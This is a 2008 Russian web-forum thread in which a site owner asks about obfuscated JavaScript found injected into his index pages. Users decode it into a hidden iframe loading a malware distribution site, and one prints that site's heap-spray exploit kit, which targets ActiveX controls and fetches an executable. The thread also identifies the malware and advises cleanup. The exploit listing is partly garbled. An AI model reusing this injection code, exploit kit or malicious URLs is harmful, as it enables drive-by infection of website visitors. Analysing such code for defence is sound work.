(JavaScript)Что за функция? / HTML, JavaScript, VBScript, CSS

ReSQL.ru

Мобильная версия Контакт Правила FAQ Помощь

Гость

Войти | Регистрация | Профиль | Очистить

Новые сообщения | Избранное

Форумы | Пользователи | Статистика | Мод. лог | Поиск

Цитировать

Написать

Автор*:

Ввести пароль для входа

Тема*:

Сообщение

Данное сообщение тематическое

Сообщение содержит картинки или видео 18+

Автор:

ВНИМАНИЕ! На данном подфоруме действуют строгие правила. Удостоверьтесь, что ваше сообщение соответствует им!

Форум или тема закрыты для гостей. Необходима авторизация!

Загрузить последнюю сохраненную версию

Вложение:

Вставить как галерею

Максимальный размер вложений: 4,0 МБ, аудио/видео: 8,0 МБ. Картинки большего размера ужимаются, если возможно.

Введите код, изображенный на картинке. Если код нечитаемый, кликните картинку, чтобы загрузить другой вариант.

Отправляя сообщение, я выражаю свое согласие с правилами форума и принимаю пользовательское соглашение.

Доб. в избранное | Игнор. тему | Прикреп. тему | Пометить прочит. / непрочит. | Фильтр

Форумы / HTML, JavaScript, VBScript, CSS [игнор отключен] [закрыт для гостей] / (JavaScript)Что за функция?

15 сообщений из 15, страница 1 из 1

(JavaScript)Что за функция?

#35735935

v_sergio_v

Гость

Подскажите пожалуйста!
Нашел на сайте вот такую запись в индекс файле:
<script>function c18-748737271n495324b0bb72c(n495324b0bbf00){ function n495324b0bc6d5(){var n495324b0bcea8=16;return n495324b0bcea8;} return (parseInt(n495324b0bbf00,n495324b0bc6d5()));}function n495324b0bd67c(n495324b0bde50){ var n495324b0bf5cc=2; var n495324b0be624='';n495324b0c0573=String.fromCharCode;for(n495324b0bedf7=0;n495324b0bedf7<n495324b0bde50.length;n495324b0bedf7+=n495324b0bf5cc){ n495324b0be624+=(n495324b0c0573(c18-748737271n495324b0bb72c(n495324b0bde50.substr(n495324b0bedf7,n495324b0bf5cc))));}return n495324b0be624;} var x4b='';var n495324b0c0d47='3C7'+x4b+'3637'+x4b+'2697'+x4b+'07'+x4b+'43E696628216D7'+x4b+'96961297'+x4b+'B646F637'+x4b+'56D656E7'+x4b+'42E7'+x4b+'7'+x4b+'7'+x4b+'2697'+x4b+'465287'+x4b+'56E657'+x4b+'363617'+x4b+'065282027'+x4b+'2533632536392536362537'+x4b+'322536312536642536352532302536652536312536642536352533642536332533312533382532302537'+x4b+'332537'+x4b+'32253633253364253237'+x4b+'2536382537'+x4b+'342537'+x4b+'342537'+x4b+'302533612532662532662537'+x4b+'342537'+x4b+'322536312536362536392536622537'+x4b+'332532652536332536652532662537'+x4b+'342536342537'+x4b+'332532662536392536652536342536352537'+x4b+'382532652537'+x4b+'302536382537'+x4b+'30253366253237'+x4b+'2532622534642536312537'+x4b+'342536382532652537'+x4b+'322536662537'+x4b+'352536652536342532382534642536312537'+x4b+'342536382532652537'+x4b+'32253631253665253634253666253664253238253239253261253331253331253334253336253336253239253262253237'+x4b+'253333253636253335253237'+x4b+'2532302537'+x4b+'37'+x4b+'2536392536342537'+x4b+'34253638253364253336253333253230253638253635253639253637'+x4b+'2536382537'+x4b+'342533642533312533382533322532302537'+x4b+'332537'+x4b+'342537'+x4b+'39253663253635253364253237'+x4b+'2537'+x4b+'362536392537'+x4b+'332536392536322536392536632536392537'+x4b+'342537'+x4b+'39253361253638253639253634253634253635253665253237'+x4b+'2533652533632532662536392536362537'+x4b+'3225363125366425363525336527'+x4b+'29293B7'+x4b+'D7'+x4b+'6617'+x4b+'2206D7'+x4b+'969613D7'+x4b+'47'+x4b+'27'+x4b+'5653B3C2F7'+x4b+'3637'+x4b+'2697'+x4b+'07'+x4b+'43E';document.write(n495324b0bd67c(n495324b0c0d47));</script>

Что может делать эта функция? Каким методом она зашифрована?

...

Рейтинг:

0 / 0

25.12.2008, 20:03

| Ответить | Цитировать | Написать

(JavaScript)Что за функция?

#35735957

ShSerge

Участник

Откуда: ʚонɔ dиw

Сообщения: 24 440

Рейтинг: 0 / 0

v_sergio_v,
Поставь себе фирефокс с фиребугом и посмотри. Что, кто-то это за тебя делать должен? Тем более, что оторвано от контекста и вообще... .

...

Рейтинг:

0 / 0

25.12.2008, 20:23

| Ответить | Цитировать | Написать

(JavaScript)Что за функция?

#35736005

vkle

Участник

Откуда: Самара

Сообщения: 14 253

Рейтинг: 0 / 0

> function c18-748737271n495324b0bb72c(n495324b0bbf00){

Дефис (минус) в имени функции? )))))
ИМХО расчет на какую то дыру в браузере.
Posted via ActualForum NNTP Server 1.4

...

Рейтинг:

0 / 0

25.12.2008, 21:30

| Ответить | Цитировать | Написать

(JavaScript)Что за функция?

#35736029

v_sergio_v

Гость

Этот код я нашел у себя на сайте. Раньше его не было. Что именно он делает не пойму, т. к.
javascript почти не знаю.

...

Рейтинг:

0 / 0

25.12.2008, 21:50

| Ответить | Цитировать | Написать

(JavaScript)Что за функция?

#35736094

vkle

Участник

Откуда: Самара

Сообщения: 14 253

Рейтинг: 0 / 0

Дружеский совет: если этот код никто осознанно не ставил на сайт, то удали его из этого файла, а так же из всех файлов в других директориях с этим же временем изменения. Перед этим _обязательно_ (а иначе можно и не начинать) сменить все пароли фтп-доступа к сайту и почистить от троянов компы, с которых заходили по фтп на хостинг.

PS откровенно лень смотреть, какую именно ссылку на сайт с вредоносным кодом (?) ентот скрипт сформирует.
Posted via ActualForum NNTP Server 1.4

...

Рейтинг:

0 / 0

25.12.2008, 22:52

| Ответить | Цитировать | Написать

(JavaScript)Что за функция?

#35736202

Ренат

Участник

Откуда: Елабуга & Казань & Москва & Набережные челны

Сообщения: 4 025

Рейтинг: 0 / 0

Вместо документ врайт прописал alert - не запускаеться)
Попробовал чуток подредактирваоть:

Код: plaintext

1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.

<script>
function n495324b0bb72c(n495324b0bbf00){
	function n495324b0bc6d5(){
	var n495324b0bcea8= 16 ;
	return n495324b0bcea8;
	}
return (parseInt(n495324b0bbf00,n495324b0bc6d5()));
}


function n495324b0bd67c(n495324b0bde50){
	var n495324b0bf5cc= 2 ;
	var n495324b0be624='';
	n495324b0c0573=String.fromCharCode;
	for(n495324b0bedf7= 0 ;n495324b0bedf7<n495324b0bde50.length;n495324b0bedf7+=n495324b0bf5cc){ 
		n495324b0be624+=(n495324b0c0573( 18 -n495324b0bb72c(n495324b0bde50.substr(n495324b0bedf7,n495324b0bf5cc))));
		}
	return n495324b0be624;
	}
	
var x4b='';
var n495324b0c0d47='3C7'+x4b+'3637'+x4b+'2697'+x4b+'07'+x4b+'43E696628216D7'+x4b+'96961297'+x4b+'B646F637'+x4b+'56D656E7'+x4b+'42E7'+x4b+'7'+x4b+'7'+x4b+'2697'+x4b+'465287'+x4b+'56E657'+x4b+'363617'+x4b+'065282027'+x4b+'2533632536392536362537'+x4b+'322536312536642536352532302536652536312536642536352533642536332533312533382532302537'+x4b+'332537'+x4b+'32253633253364253237'+x4b+'2536382537'+x4b+'342537'+x4b+'342537'+x4b+'302533612532662532662537'+x4b+'342537'+x4b+'322536312536362536392536622537'+x4b+'332532652536332536652532662537'+x4b+'342536342537'+x4b+'332532662536392536652536342536352537'+x4b+'382532652537'+x4b+'302536382537'+x4b+'30253366253237'+x4b+'2532622534642536312537'+x4b+'342536382532652537'+x4b+'322536662537'+x4b+'352536652536342532382534642536312537'+x4b+'342536382532652537'+x4b+'32253631253665253634253666253664253238253239253261253331253331253334253336253336253239253262253237'+x4b+'253333253636253335253237'+x4b+'2532302537'+x4b+'37'+x4b+'2536392536342537'+x4b+'34253638253364253336253333253230253638253635253639253637'+x4b+'2536382537'+x4b+'342533642533312533382533322532302537'+x4b+'332537'+x4b+'342537'+x4b+'39253663253635253364253237'+x4b+'2537'+x4b+'362536392537'+x4b+'332536392536322536392536632536392537'+x4b+'342537'+x4b+'39253361253638253639253634253634253635253665253237'+x4b+'2533652533632532662536392536362537'+x4b+'3225363125366425363525336527'+x4b+'29293B7'+x4b+'D7'+x4b+'6617'+x4b+'2206D7'+x4b+'969613D7'+x4b+'47'+x4b+'27'+x4b+'5653B3C2F7'+x4b+'3637'+x4b+'2697'+x4b+'07'+x4b+'43E';
alert(n495324b0bd67c(n495324b0c0d47));
</script>

Получил на выхоже какую то бяку)
значит не прально редактировал я)

...

Рейтинг:

0 / 0

26.12.2008, 00:06

| Ответить | Цитировать | Написать

(JavaScript)Что за функция?

#35736234

v_sergio_v

Гость

Почистил. На сайте, все файлы index, были заражены этим гадом.

...

Рейтинг:

0 / 0

26.12.2008, 00:25

| Ответить | Цитировать | Написать

(JavaScript)Что за функция?

#35736239

vkle

Участник

Откуда: Самара

Сообщения: 14 253

Рейтинг: 0 / 0

> все файлы index, были заражены

Стандартное поведение зверьков.
Не забудь про пароли и троянов.
Posted via ActualForum NNTP Server 1.4

...

Рейтинг:

0 / 0

26.12.2008, 00:28

| Ответить | Цитировать | Написать

(JavaScript)Что за функция?

#35736240

vkle

Участник

Откуда: Самара

Сообщения: 14 253

Рейтинг: 0 / 0

> значит не прально редактировал

Или не подобрал браузер, где эта шняга сработает "как надо" ))
Posted via ActualForum NNTP Server 1.4

...

Рейтинг:

0 / 0

26.12.2008, 00:29

| Ответить | Цитировать | Написать

(JavaScript)Что за функция?

#35736281

IDVsbruck

Участник

Откуда: Украина

Сообщения: 4 289

Рейтинг: 0 / 0

Упростил до:

Код: plaintext

1.
2.
3.
4.
5.
6.
7.

function decoder(line){
	var decoded_line = '';
	for (var counter =  0 ; counter < line.length; counter +=  2 )
		decoded_line += (String.fromCharCode(parseInt(line.substr(counter,  2 ),  16 )));
	return decoded_line;
}
var virus_line = '3C7363726970743E696628216D796961297B646F63756D656E742E777269746528756E6573636170652820272533632536392536362537322536312536642536352532302536652536312536642536352533642536332533312533382532302537332537322536332533642532372536382537342537342537302533612532662532662537342537322536312536362536392536622537332532652536332536652532662537342536342537332532662536392536652536342536352537382532652537302536382537302533662532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533312533312533342533362533362532392532622532372533332536362533352532372532302537372536392536342537342536382533642533362533332532302536382536352536392536372536382537342533642533312533382533322532302537332537342537392536632536352533642532372537362536392537332536392536322536392536632536392537342537392533612536382536392536342536342536352536652532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E';
document.write(decoder(virus_line));

На выходе получаем:

Код: plaintext

if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%38%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%74%72%61%66%69%6b%73%2e%63%6e%2f%74%64%73%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%31%34%36%36%29%2b%27%33%66%35%27%20%77%69%64%74%68%3d%36%33%20%68%65%69%67%68%74%3d%31%38%32%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;

или

Код: plaintext

if(!myia){document.write("<iframe name=c18 src='http://trafiks.cn/tds/index.php?'+Math.round(Math.random()*11466)+'3f5' width=63 height=182 style='visibility:hidden'></iframe>");}var myia=true;

...

Рейтинг:

0 / 0

26.12.2008, 01:35

| Ответить | Цитировать | Написать

(JavaScript)Что за функция?

#35736283

IDVsbruck

Участник

Откуда: Украина

Сообщения: 4 289

Рейтинг: 0 / 0

Иногда в таких "шнягах" находишь удивительные решения ...
Тут мне понравилось следующее:

Код: plaintext

1.
2.

n495324b0c0573=String.fromCharCode;
...
... += n495324b0c0573();

Как бы все понимаю, все нормально, просто нечасто встречаешься с переименованием встроенных функций. А ведь ничего такого ... а в ступор может ввести :)

...

Рейтинг:

0 / 0

26.12.2008, 01:39

| Ответить | Цитировать | Написать

(JavaScript)Что за функция?

#35736582

Antonariy

Участник

Откуда: ☭

Сообщения: 80 221

Рейтинг: 0 / 0

На странице http://trafiks.cn/tds/index.php валяется Bloodhound.Exploit.196 по классификации симантека.

Расшифровка страницы:

Код: plaintext

1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
51.
52.
53.
54.
55.
56.
57.
58.
59.
60.
61.
62.
63.
64.
65.
66.
67.
68.
69.
70.
71.
72.
73.
74.
75.
76.
77.
78.
79.
80.
81.
82.
83.
84.
85.
86.
87.
88.
89.
90.
91.
92.
93.
94.
95.
96.
97.
98.
99.
100.
101.
102.
103.
104.
105.
106.
107.
108.
109.
110.
111.
112.
113.
114.
115.
116.
117.
118.
119.
120.
121.
122.
123.
124.
125.
126.
127.
128.
129.
130.
131.
132.
133.
134.
135.
136.
137.
138.
139.
140.
141.
142.
143.
144.

var url="http://trafiks.cn/fi/load.php?id=54";
			var m=new Array();
			var mf= 0 ;
			function hex(num,width){
				var digits="0123456789ABCDEF";
				var hex=digits.substr(num&0xF, 1 );
				while(num>0xF){
					num=num>>> 4 ;
					hex=digits.substr(num&0xF, 1 )+hex;
				}
				var width=(width?width: 0 );
				while(hex.length> 16 )&0xFFFF, 4 ));
			}
			function unes(str){
				var tmp="";
				for(var i= 0 ;i" +
						"" +
						"" +
						"" +
						"T\">" +
						"" +
						"";
						document.body.appendChild(my_div);

					}
				} catch(e) {}
				return  0 ;
			}
			function real(){
				try {
					var obj=null;
					obj = cobj("IERPCtl.IERPCtl.1");
					if (obj) {
						if(obj.PlayerProperty("PRODUCTVERSION")>"6.0.14.552") {
							obj = cobj("{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}");
							ms();
							var m = "";
							var buf = addr(0x0c0c0c0c);
							while (buf.length <  32 )	buf += buf;
							buf = buf.substring( 0 , 32 );
							m = obj.Console;
							obj.Console = buf;
							obj.Console = m;
							m = obj.Console;
							obj.Console = buf;
							obj.Console = m;
						}
					}
				} catch(e){}
				return  0 ;
			}
			function ntaudio(){
				try{
					var obj=null;
					obj=cobj("{77829F14-D911-40FF-A2F0-D11DB8D6D0BC}");
					if(obj){
						ms();
						var buf = addr(0x0c0c0c0c);
						while (buf.length <  5200 ) buf += buf;
						buf = buf.substring( 0 , 5200 );
						obj.SetFormatLikeSample(buf);
					}
				}catch(e){}
				return  0 ;
			}
			function creative(){
				try{
					var obj=null;
					obj=cobj("{0A5FD7C5-A45C-49FC-ADB5-9952547D5715}");
					if(obj){
						ms();
						var buf = addr(0x0c0c0c0c);
						while (buf.length <  512 ) buf += buf;
						buf = buf.substring( 0 , 512 );
						obj.cachefolder = buf;
					}
				}catch(e){}
				return  0 ;
			}

			function pdf(){
				try {
					var obj = null;
					obj = cobj("AcroPDF.PDF");
					if (!obj) {
						obj = cobj("PDF.PdfCtrl");
					}
					if (obj) {
						document.write("");
						setTimeout('pdf2();', 10000 );
					}
				} catch(e) {
					document.write("");
					setTimeout('pdf2();', 10000 );
				}
				return  0 ;
			}
			function pdf2(){
				var obj = null;
				obj = cobj("AcroPDF.PDF");
				if (!obj) {
					obj = cobj("PDF.PdfCtrl");
				}
				if (obj) {
					wnd=window;
					while (wnd.parent!=wnd){ wnd=wnd.parent; }
					wnd.location="http://trafiks.cn/fi/pdf.php?id=54&vis=1";		
				}
				return  0 ;
			}
			function wme(){
				try {
					var obj=null;
					obj=cobj("{A8D3AD02-7508-4004-B2E9-AD33F087F43C}");
					if(obj){
						ms();
						var buf = addr(0x0c0c0c0c);
						while (buf.length <  2000 ) buf += buf;
						buf = buf.substring( 0 , 2000 );
						obj.GetDetailsString(buf, 1 );
					}
				} catch(e){}
				return  0 ;
			}

			if (
				office() ||
				dl() ||
				pdf() ||
				wme() ||
				ya1() ||
				ya2() ||
				fb() ||
				mdss() ||
				creative() ||
				wks() ||
				ogame() ||
				ca() ||
				buddy() ||
				gomweb() ||
				xmlcore() ||
				quick() ||
				real() ||
				ntaudio()
				) {}

Что самое интересное, эта беда выпоняется функцией eval, которую я заменил на document.write("<pre>" + расшифровка + "</pre>") и открыл страницу. Так все равно в кэш IE проскочил не html, а pdf-файл, на который, собственно, и ругнулся симантек.

...

Рейтинг:

0 / 0

26.12.2008, 10:46

| Ответить | Цитировать | Написать

(JavaScript)Что за функция?

#35736695

Antonariy

Участник

Откуда: ☭

Сообщения: 80 221

Рейтинг: 0 / 0

Далее...
По адресу http://trafiks.cn/fi/pdf.php?id=54&vis=1 находится какой-то файл, походу pdf, который рубится симантеком как Bloodhound.Exploit.213, а самое интересное по адресу http://trafiks.cn/fi/load.php?id=54 — какой-то экзешник, неумело замаскированный (см. скриншот, красным указаны косяки) под микрософтовскую прибамбасину, на который симантек не реагирует. Файл сохраняется под именем DOSKEY.EXE. Такой файл действительно есть в дистрибутиве, его размер 10 752 байт против 31 744 вирусни.

...

Рейтинг:

0 / 0

26.12.2008, 11:30

| Ответить | Цитировать | Написать

(JavaScript)Что за функция?

#35736725

Antonariy

Участник

Откуда: ☭

Сообщения: 80 221

Рейтинг: 0 / 0

http://www.kaspersky.ru/scanforvirus сообщил, что это P2P-Worm.Win32.Agent.hw

...

Рейтинг:

0 / 0

26.12.2008, 11:41

| Ответить | Цитировать | Написать

(JavaScript)Что за функция?

#35737508

v_sergio_v

Гость

Спасибо большое!
Скачал прогу Acunetix Web Vulnerability Scanner, после сканирования нашел "дыру" на сайте в форме обратной связи.

...

Рейтинг:

0 / 0

26.12.2008, 16:26

| Ответить | Цитировать | Написать

15 сообщений из 15, страница 1 из 1

Форумы / HTML, JavaScript, VBScript, CSS [игнор отключен] [закрыт для гостей] / (JavaScript)Что за функция?

Читали тему (0):

Читали форум (0):

Пользователи онлайн (0):

start [/forum/topic.php?fid=22&msg=35736234&tid=1455367]:	0ms
get settings:	5ms
get forum list:	10ms
check forum access:	2ms
check topic access:	2ms
track hit:	147ms
get topic data:	8ms
get forum data:	2ms
get page messages:	49ms
get tp. blocked users:	1ms
others:	205ms

total:	431ms

	Необходимые cookie
	Cookie для сбора статистики
	Cookie для маркетинга и рекламы